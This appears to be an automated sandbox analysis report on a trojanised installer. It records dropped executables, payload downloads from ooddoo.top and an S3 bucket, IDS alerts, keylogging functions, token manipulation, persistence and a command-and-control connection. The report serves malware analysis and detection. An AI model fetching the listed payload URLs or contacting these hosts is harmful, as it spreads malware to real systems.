Source: C:\ProgramData\Program\iusb3mon.exe	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\Program\iusb3mon.exe

Unpacked PE file: 30.2.iusb3mon.exe.6290000.3.unpack

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\letsvpn-latest.exe			Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.165.100:443 -> 192.168.2.6:49722 version: TLS 1.2

Source: Gabriel-4.9.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: MTGHu7b.exe, 00000012.00000003.2432557024.0000000000D30000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000003.2580730778.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: MTGHu7b.exe, 00000012.00000003.2432557024.0000000000D30000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000003.2580730778.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmp

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_06292E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

30_2_06292E2C

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49740 -> 172.67.165.100:80
Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49722 -> 172.67.165.100:443
Source: Network traffic	Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 172.67.165.100:443 -> 192.168.2.6:49722
Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49746 -> 172.67.165.100:443
Source: Network traffic	Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 172.67.165.100:443 -> 192.168.2.6:49746

Source: global traffic

TCP traffic: 192.168.2.6:49767 -> 118.107.45.13:25445

Source: Joe Sandbox View	ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_062967CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep,

30_2_062967CC

Source: global traffic	HTTP traffic detected: GET /abc/47.exe HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Setup Factory 9.0Host: ooddoo.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /abc/47.exe HTTP/1.1Accept: /User-Agent: Setup Factory 9.0Connection: Keep-AliveCache-Control: no-cacheHost: ooddoo.top
Source: global traffic	HTTP traffic detected: GET /abc/47.exe HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Setup Factory 9.0Host: ooddoo.topConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ooddoo.top
Source: global traffic	DNS traffic detected: DNS query: huazai168.com

Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtMozilla/4.0
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000016.00000002.2588197051.000000000720E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microU
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 00000024.00000002.4140413540.00000256EEC00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: MTGHu7b.exe, 00000012.00000003.2432673167.0000000002890000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000003.2581236847.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://down.360safe.com/setup.exe
Source: svchost.exe, 00000024.00000003.2471948354.00000256EEA20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: MTGHu7b.exe, 00000012.00000003.2432673167.0000000002890000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000003.2581236847.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://netmon.stat.360safe.com
Source: irsetup.exe, 00000002.00000003.2123277659.00000000054F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000C.00000002.2250729891.0000028F9027C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2250729891.0000028F903B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2229248625.0000028F81BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2559353218.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2545073218.00000000063B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2569290893.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2587202088.0000000006630000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Gabriel-4.9.exe, 00000000.00000002.2228673993.0000000002070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/
Source: irsetup.exe, 00000002.00000002.4674992748.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4674992748.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/47.exe
Source: irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/47.exeQL
Source: irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/47.exel
Source: irsetup.exe, 00000002.00000002.4674992748.0000000002A60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/47.exeu
Source: powershell.exe, 0000002E.00000002.2669271131.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.2229248625.0000028F80201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2489937666.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2476130879.0000000005351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2493698942.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2497767102.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2669271131.0000000004D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: irsetup.exe, 00000002.00000003.2428996975.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360.cn
Source: powershell.exe, 0000000C.00000002.2229248625.0000028F816B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000002E.00000002.2669271131.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2853070590.0000000007160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Gabriel-4.9.exe, 00000000.00000002.2228673993.0000000002070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.indigorose.com
Source: Gabriel-4.9.exe, 00000000.00000003.2089512069.00000000024D8000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4679398558.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2093783473.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buy
Source: Gabriel-4.9.exe, 00000000.00000003.2089512069.00000000024D8000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4679398558.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2093783473.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buyd
Source: irsetup.exe, 00000002.00000003.2095316635.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.yourcompany.com
Source: powershell.exe, 0000000C.00000002.2229248625.0000028F80201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000013.00000002.2489937666.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2476130879.0000000005351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2493698942.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2497767102.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2669271131.0000000004D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000024.00000003.2471948354.00000256EEA7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000024.00000003.2471948354.00000256EEA20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000002E.00000002.2669271131.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.2493698942.0000000004D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000C.00000002.2250729891.0000028F9027C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2250729891.0000028F903B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2229248625.0000028F81BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2559353218.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2545073218.00000000063B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2569290893.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2587202088.000000000661F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.2229248625.0000028F816B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000C.00000002.2229248625.0000028F816B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: irsetup.exe, 00000002.00000002.4667770320.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2429092754.00000000008B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/
Source: irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/
Source: irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/1L9i
Source: irsetup.exe, 00000002.00000002.4674992748.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4674992748.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2428996975.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2428996975.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/47.exe
Source: irsetup.exe, 00000002.00000002.4674992748.0000000002A60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/47.exeLoa
Source: irsetup.exe, 00000002.00000002.4674992748.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2428996975.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/47.exeZ
Source: irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/47.exeqLyi
Source: irsetup.exe, 00000002.00000003.2428996975.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/47.exer
Source: irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: irsetup.exe, 00000002.00000003.2095316635.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown

HTTPS traffic detected: 172.67.165.100:443 -> 192.168.2.6:49722 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: <BackSpace>		30_2_06292BF0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: <Enter>		30_2_06292BF0

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_06292BF0 CreateMutexA,WaitForSingleObject,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrlenA,lstrcatA,lstrcatA,

30_2_06292BF0

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_062AABEF GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

30_2_062AABEF

Source: powershell.exe	Process created: 76
Source: conhost.exe	Process created: 65
Source: cmd.exe	Process created: 47

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

PE file contains section with special chars

Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe

Process Stats: CPU usage > 49%

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_06295792 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryA,GetProcAddress,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

30_2_06295792

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0629628E WinExec,WinExec,WinExec,WinExec,Sleep,ExitWindowsEx,		30_2_0629628E
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_062939EC ExitWindowsEx,		30_2_062939EC

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Code function: 0_2_00007FF746501C88	0_2_00007FF746501C88
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Code function: 0_2_00007FF746503D40	0_2_00007FF746503D40
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026800	2_2_0000000180026800
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180030014	2_2_0000000180030014
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027854	2_2_0000000180027854
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003C0A0	2_2_000000018003C0A0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800218A4	2_2_00000001800218A4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800228CC	2_2_00000001800228CC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800308FC	2_2_00000001800308FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800310FC	2_2_00000001800310FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180033914	2_2_0000000180033914
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002B938	2_2_000000018002B938
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002F154	2_2_000000018002F154
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180033220	2_2_0000000180033220
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180024A60	2_2_0000000180024A60
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027268	2_2_0000000180027268
